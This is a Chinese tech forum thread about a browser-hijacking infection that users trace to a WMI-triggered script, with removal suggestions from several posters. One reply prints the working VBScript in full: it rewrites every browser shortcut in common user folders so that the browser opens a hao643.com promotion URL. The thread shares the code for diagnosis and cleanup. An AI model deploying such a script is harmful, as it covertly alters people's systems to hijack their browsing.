无忧启动论坛

标题: 浏览器被劫持网址 [打印本页]
作者: DOSforever    时间: 2021-8-24 04:02
提示: 作者被禁止或删除 内容自动屏蔽
作者: chishingchan    时间: 2021-8-24 06:53
如何感染此恶意脚本的有没有印象?!
一般需要太复杂的方式处理的话,在允许的情况下建议重装系统来的快。
作者: 窄口牛    时间: 2021-8-24 06:56
右下角常驻进程,服务里异常服务,或者计划任务定时操作;因为是动态修改,肯定不是启动项那么简单,启动项只是启动了后台驻留操作。
作者: szwp    时间: 2021-8-24 07:09
edge有此现像么?
作者: chenfine    时间: 2021-8-24 07:11
能换系统就换吧,不过也没有什么可担心的,只是那些推广员,推广主页链接

    前几年出现的,是一个通过WMI发起的定时自动运行脚本。利用VBScript调用系统服务将所有浏览器加上尾巴!没有进程,没有文件!

    我在一个博客上看过!下载安装WMITool,查看WMI事件!找到感染的代码干掉,再清理浏览器快捷方式尾巴能解决!也许情况会不同,关键是那个代码脚本!很多人称它 病毒脚本!

只能说,现在的推广员真真高手!
作者: 2012andyle113    时间: 2021-8-24 07:54
这手段有点高明了,这些都没有的话,那就只有服务,计划任务了
其实对付这种玩意,360是老祖宗了有效的很
作者: JERRY爱电脑    时间: 2021-8-24 10:55
1.可以用注册表搜索那个网址,看看有没有
2.用安全软件锁定
作者: sd3166    时间: 2021-8-24 11:06
因为一个主页。要重装系统。也有点。。。但有些顽固的是不好清。在试试吧
作者: zpwz    时间: 2021-8-24 11:09
36有时还是有用的
作者: DOSforever    时间: 2021-8-24 11:30
提示: 作者被禁止或删除 内容自动屏蔽
作者: DOSforever    时间: 2021-8-24 11:36
提示: 作者被禁止或删除 内容自动屏蔽
作者: DOSforever    时间: 2021-8-24 11:40
提示: 作者被禁止或删除 内容自动屏蔽
作者: 窄口牛    时间: 2021-8-24 11:40
那就可能是注入正常的系统进程了,那就得杀毒扫描了。
作者: DOSforever    时间: 2021-8-24 11:44
提示: 作者被禁止或删除 内容自动屏蔽
作者: DOSforever    时间: 2021-8-24 11:45
提示: 作者被禁止或删除 内容自动屏蔽
作者: DOSforever    时间: 2021-8-24 11:47
提示: 作者被禁止或删除 内容自动屏蔽
作者: DOSforever    时间: 2021-8-24 12:02
提示: 作者被禁止或删除 内容自动屏蔽
作者: chenfine    时间: 2021-8-24 12:11
DOSforever 发表于 2021-8-24 11:44
是的,我就是按照你说的方法查到的,可问题是即便通过 WMI Tools 删掉了定时在快捷方式上加尾巴的恶意 sc ...

有个地址是存储在WMI数据库中,删除了吗,
作者: nianyueriPE    时间: 2021-8-24 12:28
去火绒论坛求助一下。
作者: tools241    时间: 2021-8-24 13:03
本帖最后由 tools241 于 2021-8-24 13:09 编辑

本人特制的Fx91.0esr(64)与Fx(64) v92.0b7 -- 增加封锁 *hao6*.com

本人特制了多版Firefox 免安装 异空版 (已添加>20个元件, 简/繁/英 通用).
Fx91.0esr(64)(64位版元含profile及元件).7z  94.7M  v91.0esr 2021/08/09  -- 已封锁 *hao6*.com
Fx(64)(本版64位元含profile及元件).7z          94.8M  v92.0b7 2021/08/24   -- 已封锁 *hao6*.com

Fx56(免安装异空版,不支援XP,可用新旧套件不可用外挂,32位元含26元件,简繁英通用).rar
Fx17(适1G以下记忆体,简繁英通用).rar
Fx3.6.28(适768M以下记忆体,简繁通用).rar
** 上列各版早已封锁*hao1*.com, *hao5*.com, ...

Firefox -- 链接: https://pan.baidu.com/s/1hx1-WAbC10vi6rdoQySvfA 提取码: pcgk , 解压密码:tools241
作者: szwp    时间: 2021-8-24 14:10
DOSforever 发表于 2021-8-24 11:40
没有,只影响以下浏览器:

在它的列表中我只有 IE 和 Firefox 。

iexplorer.exe 和 firefox.exe  改名有效么?
作者: similarr    时间: 2021-8-24 14:31
一直被劫持困扰               
作者: DOSforever    时间: 2021-8-24 14:38
提示: 作者被禁止或删除 内容自动屏蔽
作者: DOSforever    时间: 2021-8-24 14:39
提示: 作者被禁止或删除 内容自动屏蔽
作者: haonan521    时间: 2021-8-24 15:12
DOSforever 发表于 2021-8-24 11:40
没有,只影响以下浏览器:

在它的列表中我只有 IE 和 Firefox 。

他是怎么实现锁这些浏览器主页的,可以把原理和工具说一下吗
作者: chishingchan    时间: 2021-8-24 16:04
楼主不妨将恶意脚本的程序上传,我当一回李时珍又如何?!
作者: DOSforever    时间: 2021-8-24 16:13
提示: 作者被禁止或删除 内容自动屏蔽
作者: DOSforever    时间: 2021-8-24 16:17
提示: 作者被禁止或删除 内容自动屏蔽
作者: chishingchan    时间: 2021-8-24 16:26
本帖最后由 chishingchan 于 2021-8-24 16:33 编辑
DOSforever 发表于 2021-8-24 16:17
你看下这是不是:

这是 VBScript 脚本,整理一下:
  1. On Error Resume Next

  3. Const link = "http://hao643.com/?r=ggggg&m=e18"
  4. Const link360 = "http://hao643.com/?r=ggggg&m=e18&s=3"

  6. browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"

  8. lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\Administrator\Desktop,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"

  10. browsersArr = split(browsers,",")

  12. Set oDic = CreateObject("scripting.dictionary")

  14. For Each browser In browsersArr
  15.         oDic.Add LCase(browser), browser
  16. Next

  18. lnkpathsArr = split(lnkpaths,",")

  20. Set oFolders = CreateObject("scripting.dictionary")

  22. For Each lnkpath In lnkpathsArr
  23.         oFolders.Add lnkpath, lnkpath
  24. Next

  26. Set fso = CreateObject("Scripting.Filesystemobject")

  28. Set WshShell = CreateObject("Wscript.Shell")

  30. For Each oFolder In oFolders
  31.         If fso.FolderExists(oFolder) Then
  32.                 For Each file In fso.GetFolder(oFolder).Files
  33.                         If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
  34.                                 Set oShellLink = WshShell.CreateShortcut(file.Path)
  35.                                 path = oShellLink.TargetPath
  36.                                 name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
  37.                                 If oDic.Exists(LCase(name)) Then
  38.                                         If LCase(name) = LCase("360se.exe") Then
  39.                                                 oShellLink.Arguments = link360
  40.                                         Else
  41.                                                 oShellLink.Arguments = link
  42.                                         End If
  43.                                         If file.Attributes And 1 Then
  44.                                                 file.Attributes = file.Attributes - 1
  45.                                         End If
  46.                                         oShellLink.Save
  47.                                 End If
  48.                         End If
  49.                 Next
  50.         End If
  51. Next
复制代码


作者: JERRY爱电脑    时间: 2021-8-24 22:09
DOSforever 发表于 2021-8-24 11:47
搜过,没有。某些安全软件更不安全。

浏览器目录新建一个bat,用start命令打开浏览器,快捷方式指向bat就可以
作者: DOSforever    时间: 2021-9-5 00:28
提示: 作者被禁止或删除 内容自动屏蔽



欢迎光临 无忧启动论坛 (http://wuyou.net/) Powered by Discuz! X3.3